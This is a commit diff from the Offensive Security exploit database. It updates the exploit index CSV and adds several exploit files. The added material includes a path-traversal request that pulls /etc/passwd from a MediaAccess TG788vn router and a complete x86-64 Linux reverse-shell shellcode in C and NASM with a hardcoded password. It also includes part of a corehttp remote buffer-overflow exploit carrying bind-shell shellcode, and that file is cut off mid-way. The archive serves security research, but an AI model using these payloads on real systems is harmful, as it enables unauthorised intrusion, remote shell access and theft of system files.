DB: 2016-01-07

10 new exploits
This commit is contained in:
Offensive Security 2016-01-07 05:01:40 +00:00
parent cf1ca0a5f7
commit 53d9096a7c
14 changed files with 1707 additions and 611 deletions

View file

@ -1505,7 +1505,7 @@ id,file,description,date,author,platform,type,port
1791,platforms/multiple/remote/1791.patch,"RealVNC 4.1.0 - 4.1.1 - VNC Null Authentication Bypass (Patch EXE)",2006-05-16,redsand,multiple,remote,5900
1792,platforms/windows/dos/1792.txt,"GNUnet <= 0.7.0d - (Empty UDP Packet) Remote Denial of Service Exploit",2006-05-15,"Luigi Auriemma",windows,dos,0
1793,platforms/php/webapps/1793.pl,"DeluxeBB <= 1.06 (name) Remote SQL Injection Exploit (mq=off)",2006-05-15,KingOfSka,php,webapps,0
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1794,platforms/multiple/remote/1794.pm,"RealVNC 4.1.0 - 4.1.1 - (Null Authentication) Auth Bypass Exploit (meta)",2006-05-15,"H D Moore",multiple,remote,5900
1795,platforms/php/webapps/1795.txt,"ezusermanager <= 1.6 - Remote File Inclusion Vulnerability",2006-05-15,OLiBekaS,php,webapps,0
1796,platforms/php/webapps/1796.php,"PHP-Fusion <= 6.00.306 (srch_where) SQL Injection Exploit",2006-05-16,rgod,php,webapps,0
1797,platforms/php/webapps/1797.php,"DeluxeBB <= 1.06 (Attachment mod_mime) Remote Exploit",2006-05-16,rgod,php,webapps,0
@ -3888,7 +3888,7 @@ id,file,description,date,author,platform,type,port
4240,platforms/windows/remote/4240.html,"VMware IntraProcessLogging.dll 5.5.3.42958 - Arbitrary Data Write Exploit",2007-07-28,callAX,windows,remote,0
4241,platforms/php/webapps/4241.txt,"PHP123 Top Sites (category.php cat) Remote SQL Injection Vuln",2007-07-28,t0pP8uZz,php,webapps,0
4242,platforms/php/webapps/4242.php,"LinPHA <= 1.3.1 (new_images.php) Remote Blind SQL Injection Exploit",2007-07-29,EgiX,php,webapps,0
4243,platforms/linux/remote/4243.c,"corehttp 0.5.3alpha (httpd) Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4243,platforms/linux/remote/4243.c,"CoreHTTP 0.5.3alpha (httpd) - Remote Buffer Overflow Exploit",2007-07-29,vade79,linux,remote,80
4244,platforms/windows/remote/4244.html,"VMware Inc 6.0.0 (vielib.dll 2.2.5.42958) Remode Code Execution Exploit",2007-07-29,callAX,windows,remote,0
4245,platforms/windows/remote/4245.html,"VMware Inc 6.0.0 CreateProcess Remote Code Execution Exploit",2007-07-30,callAX,windows,remote,0
4246,platforms/php/webapps/4246.txt,"wolioCMS Auth Bypass / Remote SQL Injection Vulnerabilities",2007-07-30,k1tk4t,php,webapps,0
@ -7474,7 +7474,7 @@ id,file,description,date,author,platform,type,port
7940,platforms/php/webapps/7940.txt,"WholeHogSoftware Ware Support (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7941,platforms/php/webapps/7941.txt,"WholeHogSoftware Password Protect (Auth Bypass) SQL Injection Vuln",2009-02-02,ByALBAYX,php,webapps,0
7942,platforms/windows/dos/7942.pl,"Elecard AVC HD PLAYER (m3u/xpl file) Local Stack Overflow PoC",2009-02-02,AlpHaNiX,windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7943,platforms/windows/dos/7943.py,"RealVNC 4.1.2 - (vncviewer.exe) RFB Protocol Remote Code Execution PoC",2009-02-02,"Andres Luksenberg",windows,dos,0
7944,platforms/php/webapps/7944.php,"phpBLASTER 1.0 RC1 (blaster_user) Blind SQL Injection Exploit",2009-02-02,darkjoker,php,webapps,0
7945,platforms/php/webapps/7945.php,"CMS Mini <= 0.2.2 - Remote Command Execution Exploit",2009-02-02,darkjoker,php,webapps,0
7946,platforms/php/webapps/7946.txt,"sourdough 0.3.5 - Remote File Inclusion Vulnerability",2009-02-02,ahmadbady,php,webapps,0
@ -9632,7 +9632,7 @@ id,file,description,date,author,platform,type,port
10345,platforms/windows/local/10345.py,"gAlan - (.galan) Universal Buffer Overflow Exploit",2009-12-07,Dz_attacker,windows,local,0
10346,platforms/windows/local/10346.rb,"gAlan 0.2.1 - Universal Buffer Overflow Exploit (meta)",2009-12-07,loneferret,windows,local,0
10347,platforms/hardware/webapps/10347.txt,"Barracuda IMFirewall 620 Vulnerability",2009-12-07,Global-Evolution,hardware,webapps,0
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10349,platforms/linux/dos/10349.py,"CoreHTTP Web server <= 0.5.3.1 - off-by-one Buffer Overflow Vulnerability",2009-12-02,"Patroklos Argyroudis",linux,dos,80
10350,platforms/php/webapps/10350.txt,"IRAN N.E.T E-commerce Group SQL Injection Vulnerability",2009-12-08,"Dr.0rYX AND Cr3W-DZ",php,webapps,0
10351,platforms/php/webapps/10351.txt,"MarieCMS 0.9 - LFI & RFI & XSS Vulnerabilities",2009-12-07,"Amol Naik",php,webapps,0
10352,platforms/hardware/dos/10352.txt,"TANDBERG F8.2 / F8.0 / F7.2 / F6.3 - Remote Denial of Service",2009-12-06,otokoyama,hardware,dos,0
@ -14291,7 +14291,7 @@ id,file,description,date,author,platform,type,port
16486,platforms/windows/remote/16486.rb,"Novell NetMail <= 3.52d - IMAP AUTHENTICATE Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16487,platforms/windows/remote/16487.rb,"Ipswitch IMail IMAP SEARCH Buffer Overflow",2010-06-15,metasploit,windows,remote,0
16488,platforms/windows/remote/16488.rb,"Novell NetMail <= 3.52d IMAP APPEND Buffer Overflow",2010-05-09,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16489,platforms/windows/remote/16489.rb,"RealVNC 3.3.7 - Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16490,platforms/windows/remote/16490.rb,"UltraVNC 1.0.1 Client Buffer Overflow",2010-04-30,metasploit,windows,remote,0
16491,platforms/windows/remote/16491.rb,"WinVNC Web Server <= 3.3.3r7 - GET Overflow",2009-12-06,metasploit,windows,remote,0
16492,platforms/windows/remote/16492.rb,"Novell iPrint Client ActiveX Control ExecuteRequest debug Buffer Overflow",2010-09-21,metasploit,windows,remote,0
@ -15389,7 +15389,7 @@ id,file,description,date,author,platform,type,port
17715,platforms/windows/local/17715.html,"F-Secure Multiple Products ActiveX SEH Overwrite Vulnerability (Heap Spray)",2011-08-24,41.w4r10r,windows,local,0
17716,platforms/php/webapps/17716.txt,"WordPress SendIt plugin <= 1.5.9 - Blind SQL Injection Vulnerability",2011-08-25,evilsocket,php,webapps,0
17718,platforms/windows/dos/17718.pl,"Groovy Media Player 2.6.0 - (.m3u) Local Buffer Overflow PoC",2011-08-26,"D3r K0n!G",windows,dos,0
17719,platforms/windows/remote/17719.rb,"RealVNC Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17719,platforms/windows/remote/17719.rb,"RealVNC - Authentication Bypass",2011-08-26,metasploit,windows,remote,0
17720,platforms/php/webapps/17720.txt,"WordPress Photoracer plugin <= 1.0 - SQL Injection Vulnerability",2011-08-26,evilsocket,php,webapps,0
17721,platforms/windows/remote/17721.rb,"Sunway Force Control SCADA 6.1 SP3 httpsrv.exe Exploit",2011-08-26,"Canberk BOLAT",windows,remote,0
17722,platforms/php/webapps/17722.rb,"Jcow Social Networking Script 4.2 <= 5.2 - Arbitrary Code Execution",2011-08-26,"Aung Khant",php,webapps,0
@ -15648,7 +15648,7 @@ id,file,description,date,author,platform,type,port
18012,platforms/multiple/webapps/18012.txt,"Metasploit 4.1.0 Web UI stored XSS Vulnerability",2011-10-20,"Stefan Schurtz",multiple,webapps,0
18013,platforms/windows/webapps/18013.py,"Cyclope Internet Filtering Proxy 4.0 - Stored XSS",2011-10-20,loneferret,windows,webapps,0
18014,platforms/windows/dos/18014.html,"Opera <= 11.51 Use After Free Crash PoC",2011-10-21,"Roberto Suggi Liverani",windows,dos,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18015,platforms/cgi/remote/18015.rb,"HP Power Manager - 'formExportDataLogs' Buffer Overflow",2011-10-20,metasploit,cgi,remote,0
18016,platforms/windows/remote/18016.txt,"Oracle AutoVue 20.0.1 AutoVueX - ActiveX Control SaveViewStateToFile Vulnerability",2011-10-21,rgod,windows,remote,0
18017,platforms/windows/dos/18017.py,"Cyclope Internet Filtering Proxy 4.0 - CEPMServer.exe DoS (Poc)",2011-10-21,loneferret,windows,dos,0
18018,platforms/php/webapps/18018.php,"Sports PHool <= 1.0 - Remote File Include Exploit",2011-10-21,"cr4wl3r ",php,webapps,0
@ -16881,7 +16881,7 @@ id,file,description,date,author,platform,type,port
19512,platforms/linux/local/19512.sh,"Mandriva Linux Mandrake 6.0_Gnome Libs 1.0.8 espeaker - Local Buffer Overflow",1999-09-26,"Brock Tellier",linux,local,0
19513,platforms/hardware/dos/19513.txt,"Eicon Networks DIVA LAN ISDN Modem 1.0 Release 2.5/1.0/2.0 - DoS",1999-09-27,"Bjorn Stickler",hardware,dos,0
19514,platforms/windows/remote/19514.txt,"Adobe Acrobat ActiveX Control 1.3.188 - ActiveX Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19515,platforms/windows/remote/19515.txt,"Microsoft Internet Explorer 4.0 for Windows 95/Windows NT 4 - Setupctl ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,remote,0
19516,platforms/windows/local/19516.txt,"Microsoft MSN Messenger Service 1.0 Setup BBS ActiveX Control Buffer Overflow",1999-09-27,"Shane Hird",windows,local,0
19517,platforms/linux/local/19517.pl,"Emesene 2.12.5 - Password Disclosure",2012-07-01,"Daniel Godoy",linux,local,0
19793,platforms/php/webapps/19793.txt,"Magento eCommerce Local File Disclosure",2012-07-13,"SEC Consult",php,webapps,0
@ -30264,7 +30264,7 @@ id,file,description,date,author,platform,type,port
33549,platforms/linux/dos/33549.txt,"OpenOffice 3.1 - (.slk) NULL Pointer Dereference Remote Denial of Service Vulnerability",2010-01-19,"Hellcode Research",linux,dos,0
33550,platforms/php/webapps/33550.txt,"VisualShapers ezContents <= 2.0.3 - Authentication Bypass and Multiple SQL Injection Vulnerabilities",2010-01-19,"AmnPardaz Security Research Team",php,webapps,0
33551,platforms/php/webapps/33551.txt,"PHPMySpace Gold 8.0 - 'gid' Parameter SQL Injection Vulnerability",2010-01-20,Ctacok,php,webapps,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33552,platforms/windows/remote/33552.txt,"Microsoft Internet Explorer 8 - URI Validation Remote Code Execution Vulnerability",2010-01-21,"Lostmon Lords",windows,remote,0
33553,platforms/multiple/remote/33553.txt,"Sun Java System Web Server 6.1/7.0 Digest Authentication Remote Buffer Overflow Vulnerability",2010-01-21,Intevydis,multiple,remote,0
33554,platforms/linux/remote/33554.py,"TORQUE Resource Manager 2.5.x-2.5.13 - Stack Based Buffer Overflow Stub",2014-05-28,bwall,linux,remote,0
33555,platforms/php/webapps/33555.txt,"AuraCMS 3.0 - Multiple Vulnerabilities",2014-05-28,"Mustafa ALTINKAYNAK",php,webapps,0
@ -32648,7 +32648,7 @@ id,file,description,date,author,platform,type,port
36206,platforms/windows/remote/36206.rb,"Persistent Systems Client Automation Command Injection RCE",2015-02-27,"Ben Turner",windows,remote,3465
36207,platforms/windows/local/36207.py,"Microsoft Office Word 2007 - RTF Object Confusion (ASLR and DEP Bypass)",2015-02-28,R-73eN,windows,local,0
36208,platforms/php/webapps/36208.txt,"vtiger CRM 5.2 'onlyforuser' Parameter SQL Injection Vulnerability",2011-10-15,"Aung Khant",php,webapps,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36209,platforms/windows/remote/36209.html,"Microsoft Internet Explorer 8 - Select Element Memory Corruption Vulnerability",2011-10-11,"Ivan Fratric",windows,remote,0
36262,platforms/windows/webapps/36262.txt,"Solarwinds Orion Service - SQL Injection Vulnerabilities",2015-03-04,"Brandon Perry",windows,webapps,0
36263,platforms/linux/remote/36263.rb,"Symantec Web Gateway 5 restore.php Post Authentication Command Injection",2015-03-04,metasploit,linux,remote,443
36211,platforms/windows/dos/36211.txt,"Microsoft Host Integration Server 2004-2010 - Remote Denial Of Service Vulnerability",2011-04-11,"Luigi Auriemma",windows,dos,0
@ -33335,7 +33335,7 @@ id,file,description,date,author,platform,type,port
36929,platforms/jsp/webapps/36929.txt,"Ilient SysAid 8.5.5 Multiple Cross Site Scripting and HTML Injection Vulnerabilities",2012-03-08,"Julien Ahrens",jsp,webapps,0
36930,platforms/multiple/webapps/36930.txt,"Wordpress Freshmail Unauthenticated SQL Injection",2015-05-07,"Felipe Molina",multiple,webapps,0
36931,platforms/hardware/remote/36931.txt,"Barracuda CudaTel Communication Server 2.0.029.1 Multiple HTML Injection Vulnerabilities",2012-03-08,"Benjamin Kunz Mejri",hardware,remote,0
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36932,platforms/windows/remote/36932.py,"RealVNC 4.1.0 and 4.1.1 - Authentication Bypass Exploit",2012-05-13,fdiskyou,windows,remote,5900
36933,platforms/linux/remote/36933.py,"ShellShock dhclient Bash Environment Variable Command Injection PoC",2014-09-29,fdiskyou,linux,remote,0
36934,platforms/asp/webapps/36934.txt,"SAP Business Objects InfoVew System listing.aspx searchText Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
36935,platforms/asp/webapps/36935.txt,"SAP Business Objects InfoView System /help/helpredir.aspx guide Parameter XSS",2012-03-08,vulns@dionach.com,asp,webapps,0
@ -35399,13 +35399,15 @@ id,file,description,date,author,platform,type,port
39145,platforms/cgi/webapps/39145.txt,"Xangati XSR And XNR 'gui_input_test.pl' Remote Command Execution Vulnerability",2014-04-14,"Jan Kadijk",cgi,webapps,0
39146,platforms/php/webapps/39146.txt,"Jigowatt PHP Event Calendar 'day_view.php' SQL Injection Vulnerability",2014-04-14,"Daniel Godoy",php,webapps,0
39147,platforms/osx/local/39147.c,"Apple Mac OS X Local Security Bypass Vulnerability",2014-04-22,"Ian Beer",osx,local,0
39150,platforms/php/webapps/39150.txt,"Open Audit SQL Injection Vulnerability",2016-01-02,"Rahul Pratap Singh",php,webapps,0
39151,platforms/lin_x86-64/shellcode/39151..c,"x86_64 Linux bind TCP port shellcode",2016-01-02,Scorpion_,lin_x86-64,shellcode,0
39152,platforms/linux/shellcode/39152..c,"tcp bindshell with password prompt in 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39152,platforms/linux/shellcode/39152..c,"TCP Bindshell with Password Prompt - 162 bytes",2016-01-02,"Sathish kumar",linux,shellcode,0
39153,platforms/php/webapps/39153.txt,"iDevAffiliate 'idevads.php' SQL Injection Vulnerability",2014-04-22,"Robert Cooper",php,webapps,0
39154,platforms/hardware/remote/39154.txt,"Comtrend CT-5361T Router password.cgi Admin Password Manipulation CSRF",2014-04-21,"TUNISIAN CYBER",hardware,remote,0
39155,platforms/linux/remote/39155.txt,"lxml 'clean_html' Function Security Bypass Vulnerability",2014-04-15,"Maksim Kochkin",linux,remote,0
39156,platforms/cgi/webapps/39156.txt,"ZamFoo Multiple Remote Command Execution Vulnerabilities",2014-04-02,Al-Shabaab,cgi,webapps,0
39157,platforms/php/webapps/39157.txt,"Puntopy 'novedad.php' SQL Injection Vulnerability",2014-04-06,"Felipe Andrian Peixoto",php,webapps,0
39159,platforms/windows/local/39159.py,"FTPShell Client 5.24 - Add to Favorites Buffer Overflow",2016-01-04,INSECT.B,windows,local,0
39161,platforms/windows/remote/39161.py,"Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution",2016-01-04,"Avinash Thapa",windows,remote,0
39162,platforms/multiple/dos/39162.txt,"pdfium CPDF_DIBSource::DownSampleScanline32Bit - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
39163,platforms/multiple/dos/39163.txt,"pdfium CPDF_TextObject::CalcPositionData - Heap-Based Out-of-Bounds Read",2016-01-04,"Google Security Research",multiple,dos,0
@ -35422,3 +35424,11 @@ id,file,description,date,author,platform,type,port
39175,platforms/multiple/remote/39175.py,"AssistMyTeam Team Helpdesk Multiple Information Disclosure Vulnerabilities",2014-05-05,bhamb,multiple,remote,0
39176,platforms/php/webapps/39176.html,"TOA Cross Site Request Forgery Vulnerability",2014-05-08,"High-Tech Bridge",php,webapps,0
39177,platforms/multiple/dos/39177.py,"VLC Media Player '.wav' File Memory Corruption Vulnerability",2014-05-09,"Aryan Bayaninejad",multiple,dos,0
39178,platforms/php/webapps/39178.txt,"CMS Touch pages.php Page_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39179,platforms/php/webapps/39179.txt,"CMS Touch news.php News_ID Parameter SQL Injection",2014-05-08,indoushka,php,webapps,0
39180,platforms/windows/dos/39180.pl,"Winamp '.flv' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39181,platforms/windows/dos/39181.py,"Intel Indeo Video Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39182,platforms/multiple/dos/39182.py,"RealPlayer '.3gp' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",multiple,dos,0
39183,platforms/windows/dos/39183.py,"ALLPlayer '.wav' File Processing Memory Corruption Vulnerability",2014-05-16,"Aryan Bayaninejad",windows,dos,0
39184,platforms/hardware/webapps/39184.txt,"MediaAccess TG788vn - Unauthenticated File Disclosure",2016-01-06,0x4148,hardware,webapps,0
39185,platforms/lin_x86-64/shellcode/39185.c,"TCP Reverse Shell with Password Prompt - 151 bytes",2016-01-06,"Sathish kumar",lin_x86-64,shellcode,0

Can't render this file because it is too large.

View file

@ -0,0 +1,32 @@
Vulnerable hardware : MediaAccess TG788vn with Cisco http firewall
Author : Ahmed Sultan (0x4148)
Email : 0x4148@gmail.com
MediaAccess TG788vn with Cisco firewall http config is vulnerable to
critical unauthenticated file disclosure flaw,
POC
Request:
POST /scgi-bin/platform.cgi HTTP/1.1
Host: xx.xx.xx.xx
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://xx.xx.xx.xx/scgi-bin/platform.cgi
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 164
button.login.home=Se%20connecter&Login.userAgent=0x4148_Fu&reload=0&SSLVPNUser.Password=0x4148Fu&SSLVPNUser.UserName=0x4148&thispage=../../../../../../etc/passwd%00
Response:
HTTP/1.0 200 OK
Date: Sat, 01 Jan 2011 00:00:45 GMT
Server: Embedded HTTP Server.
Connection: close
loic_ipsec:x:500:500:xauth:/:/bin/cli
the http server is running with root privileges , which mean that the
attacker might escalate the exploit for further critical attacks

View file

@ -0,0 +1,184 @@
/*---------------------------------------------------------------------------------------------------------------------
/*
*Title: tcp reverse shell with password prompt in 151 bytes
*Author: Sathish kumar
*Contact: https://www.linkedin.com/in/sathish94
* Copyright: (c) 2016 iQube. (http://iQube.io)
* Release Date: January 6, 2016
*Description: x64 Linux reverse TCP port shellcode on port 4444 with reconfigurable password
*Tested On: Ubuntu 14.04 LTS
*SLAE64-1408
*Build/Run: gcc -fno-stack-protector -z execstack bindshell.c -o bindshell
* ./bindshell
* nc localhost 4444
*
*/
/*
* NOTE: This C code binds on port 4444
* The top of this file contains the .nasm source code
* The Port can be Reconfigured According to your needs
* Instructions for changing port number
* Port obtainer change the port value accorddingly
* port.py
* import socket
* port = 4444
* hex(socket.htons(port))
* python port.py
* Result : 0x5c11
* Replace the obtained value in the shellcode to change the port number
* For building the from .nasm source use
* nasm -felf64 filename.nasm -o filename.o
* ld filename.o -o filename
* To inspect for nulls
* objdump -M intel -D filename.o
global _start
_start:
jmp sock
prompt: db 'Passcode' ; initilization of prompt data
; sock = socket(AF_INET, SOCK_STREAM, 0)
; AF_INET = 2
; SOCK_STREAM = 1
; syscall number 41
sock:
xor rax, rax ;Xor function will null the values in the register beacuse we doesn't know whats the value in the register in realtime cases
xor rsi, rsi
mul rsi
push byte 0x2 ;pusing argument to the stack
pop rdi ; poping the argument to the rdi instructions on the top of the stack should be remove first because stack LIFO
inc esi ; already rsi is 0 so incrementing the rsi register will make it 1
push byte 0x29 ; pushing the syscall number into the rax by using stack
pop rax
syscall
; copying the socket descripter from rax to rdi register so that we can use it further
xchg rax, rdi
; server.sin_family = AF_INET
; server.sin_port = htons(PORT)
; server.sin_addr.s_addr = INADDR_ANY
; bzero(&server.sin_zero, 8)
; setting up the data sctructure
xor rax, rax
push rax ; bzero(&server.sin_zero, 8)
mov ebx , 0xfeffff80 ; ip address 127.0.0.1 "noted" to remove null
not ebx
mov dword [rsp-4], ebx
sub rsp , 4 ; adjust the stack
push word 0x5c11 ; port 4444 in network byte order
push word 0x02 ; AF_INET
push rsp
pop rsi
; connecting to the remote ip
push 0x2a
pop rax
push 0x10
pop rdx
syscall
; initilization of dup2
push 0x3
pop rsi ; setting argument to 3
duplicate:
dec esi
mov al, 0x21 ;duplicate syscall applied to error,output and input using loop
syscall
jne duplicate
xor rax, rax
inc al ; rax register to value 1 syscall for write
push rax
pop rdi ; rdi register to value 1
lea rsi, [rel prompt]
xor rdx, rdx ; xor the rdx register to clear the previous values
push 0xe
pop rdx
syscall
; checking the password using read
password_check:
push rsp
pop rsi
xor rax, rax ; system read syscall value is 0 so rax is set to 0
syscall
push 0x6b636168 ; password to connect to shell is hack which is pushed in reverse and hex encoded
pop rax
lea rdi, [rel rsi]
scasd ; comparing the user input and stored password in the stack
jne Exit
execve: ; Execve format , execve("/bin/sh", 0 , 0)
xor rsi , rsi
mul rsi ; zeroed rax , rdx register
push ax ; terminate string with null
mov rbx , 0x68732f2f6e69622f ; "/bin//sh" in reverse order
push rbx
push rsp
pop rdi ; set RDI
push byte 0x3b ; execve syscall number (59)
pop rax
syscall
Exit:
;Exit shellcode if password is wrong
push 0x3c
pop rax ;syscall number for exit is 60
xor rdi, rdi
syscall
*/
#include<stdio.h>
#include<string.h>
unsigned char code[] = \
"\xeb\x08\x50\x61\x73\x73\x63\x6f\x64\x65\x48\x31\xc0\x48\x31\xf6\x48\xf7\xe6\x6a\x02\x5f\xff\xc6\x6a\x29\x58\x0f\x05\x48\x97\x48\x31\xc0\x50\xbb"
//ip address which can be obtained by
/* example 10.1.75.202
* hex value equivalent = 0a.01.4b.ca
*/
//replace this with the ip address of the system to which the shell should connect
"\x0a\x01\x4b\xca"
"\x89\x5c\x24\xfc\x48\x83\xec\x04\x66\x68"
//Port number this can be obtained from the above instrcutions
"\x11\x5c"
"\x66\x6a\x02\x54\x5e\x6a\x2a\x58\x6a\x10\x5a\x0f\x05\x6a\x03\x5e\xff\xce\xb0\x21\x0f\x05\x75\xf8\x48\x31\xc0\xfe\xc0\x50\x5f\x48\x8d\x35\xa8\xff\xff\xff\x48\x31\xd2\x6a\x0e\x5a\x0f\x05\x54\x5e\x48\x31\xc0\x0f\x05\x68"
//Password this can be obtained by
/*
* python
* password = 'hack'
* (password[::-1]).encode('hex')
* Reuslt : 6b636168
* This is stored in reverse beacuse of stack
*
*
*/
"\x68\x61\x63\x6b"
"\x58\x48\x8d\x3e\xaf\x75\x1a\x48\x31\xf6\x48\xf7\xe6\x66\x50\x48\xbb\x2f\x62\x69\x6e\x2f\x2f\x73\x68\x53\x54\x5f\x6a\x3b\x58\x0f\x05\x6a\x3c\x58\x48\x31\xff\x0f\x05";
main()
{
printf("Shellcode Length: %d\n", (int)strlen(code));
int (*ret)() = (int(*)())code;
ret();
}

View file

@ -1,332 +1,332 @@
/*[ corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. ]**********
* *
* by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* compile: *
* gcc xcorehttp.c -o xcorehttp *
* *
* syntax: *
* ./xcorehttp [-r] -h host -p port *
* *
* corehttp homepage/url: *
* http://corehttp.sourceforge.net/ *
* *
* bug(http.c): *
* ----------------------------------------------------------------------- *
* struct sprock_t *HttpSprockMake(struct sprock_t *parentsprock) { *
* struct sprock_t *sprocket; *
* char req[PATHSIZE], url[PATHSIZE], status[PATHSIZE], temp[BUFSIZE], *
* ... *
* if ((sprocket = (struct sprock_t *) *
* malloc(sizeof(struct sprock_t))) == NULL) return NULL; *
* ... *
* sscanf(parentsprock->buffer, "%[A-Za-z] %s%*[ \t\n]", req, url); *
* !(the bug/overwrite) --------------------------------------^----^ *
* strncpy(sprocket->parent->url, url, PATHSIZE); *
* !(the problem) -^ *
* ... *
* for (i = 0; req[i] != '\0'; i++) *
* req[i] = toupper(req[i]); *
* !(another problem) -^ *
* ... *
* } *
* ----------------------------------------------------------------------- *
* *
* explaination: *
* the sscanf() call in the above code contains no bounds checks for *
* writing to either req[] or url[] (i chose url[] as it gave more room *
* to work with, by overwriting into req[], and isnt limited to *
* alphabetical characters only) *
* *
* the first problem is that this overflows into the *sprocket structure *
* pointer, which is used immediately after the overflow. this is *
* automatically calculated in this exploit, using the same location in *
* memory with an offset. (+512 to ret address, which points to the nops) *
* *
* the second problem is all lowercase characters get uppercased, this *
* will happen weither or not you overwrite via req[] or url[]. if the *
* return address contains a lowercase character it will uppercase it. *
* *
* this exploit has 256(%4) bytes of working room, so avoiding lowercase *
* characters should be doable. *
* *
* note: *
* there are two areas in the stack this will appear, the one closer *
* to the top of the stack should be used. *
* *
* example usage: *
* [v9@fhalo v9]$ gcc xcorehttp.c -o xcorehttp *
* [v9@fhalo v9]$ ./xcorehttp -h dual.fakehalo.lan -p 5555 *
* [*] corehttp[v0.5.3alpha]: httpd remote buffer overflow exploit. *
* [*] by: vade79/v9 v9@fakehalo.us (fakehalo/realhalo) *
* *
* [*] target : dual.fakehalo.lan:5555 *
* [*] return address : 0xbfffea60 *
* [*] *sprocket replacement : 0xbfffec60 *
* *
* [*] attempting to connect: dual.fakehalo.lan:5555. *
* [*] successfully connected: dual.fakehalo.lan:5555. *
* [*] sending string: *
* [+] "X [NOPS+SHELLCODEx512]|[ADDR1x16][ADDR2x256]\r\n\r\n" *
* [*] closing connection. *
* *
* [*] attempting to connect: dual.fakehalo.lan:7979. *
* [*] successfully connected: dual.fakehalo.lan:7979. *
* *
* Linux fhlnxd 2.4.22-10mdk #1 Thu Sep 18 12:30:58 CEST 2003 i686 unkn$ *
* uid=501(v9) gid=501(v9) groups=501(v9) *
* *
* (...nothing like a overly complex exploit to quench my brain thirst. *
* although, i didn't do any support for randomized memory addresses, oh *
* well) *
***************************************************************************/
#include <stdio.h>
#include <stdlib.h>
#ifndef __USE_BSD
#define __USE_BSD
#endif
#include <string.h>
#include <strings.h>
#include <signal.h>
#include <unistd.h>
#include <netdb.h>
#include <getopt.h>
#include <ctype.h>
#include <sys/socket.h>
#include <sys/types.h>
#include <sys/time.h>
#include <netinet/in.h>
#include <arpa/inet.h>
#define BUFSIZE (2+512+16+256+4)
#define TIMEOUT 10
#define SPORT 7979
#define DFL_RETADDR 0xbfffea60
/* globals. */
/* linux_ia32_bind - LPORT=7979 Size=243 Encoder=PexAlphaNum */
/* http://metasploit.com */
/* filt: 0x00 0x0a 0x0d 0x2b 0x25 0x3f 0x20 0x2f 0x09 (0x61-0x7a) */
static char x86_bind[]=
"\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x4f\x49\x49\x49\x49\x49"
"\x49\x51\x5a\x56\x54\x58\x36\x33\x30\x56\x58\x34\x41\x30\x42\x36"
"\x48\x48\x30\x42\x33\x30\x42\x43\x56\x58\x32\x42\x44\x42\x48\x34"
"\x41\x32\x41\x44\x30\x41\x44\x54\x42\x44\x51\x42\x30\x41\x44\x41"
"\x56\x58\x34\x5a\x38\x42\x44\x4a\x4f\x4d\x41\x53\x4b\x4d\x43\x35"
"\x43\x44\x43\x35\x4c\x56\x44\x50\x4c\x56\x48\x46\x4a\x45\x49\x39"
"\x49\x48\x41\x4e\x4d\x4c\x42\x38\x48\x49\x43\x44\x44\x35\x48\x36"
"\x4a\x56\x4f\x31\x4b\x52\x48\x46\x43\x45\x49\x48\x41\x4e\x4c\x36"
"\x48\x56\x4a\x35\x42\x55\x41\x55\x48\x55\x49\x48\x41\x4e\x4d\x4c"
"\x42\x48\x42\x4b\x48\x46\x41\x4d\x43\x4e\x4d\x4c\x42\x38\x44\x55"
"\x44\x45\x48\x45\x43\x34\x49\x58\x41\x4e\x42\x4b\x48\x56\x4d\x4c"
"\x42\x38\x43\x39\x4c\x36\x44\x30\x49\x55\x42\x4b\x4f\x53\x4d\x4c"
"\x42\x48\x49\x34\x49\x37\x49\x4f\x42\x4b\x4b\x30\x44\x55\x4a\x56"
"\x4f\x32\x4f\x52\x43\x57\x4a\x46\x4a\x36\x4f\x42\x44\x56\x49\x46"
"\x50\x46\x49\x48\x43\x4e\x44\x55\x43\x45\x49\x38\x41\x4e\x4d\x4c"
"\x42\x58\x5a";
struct{
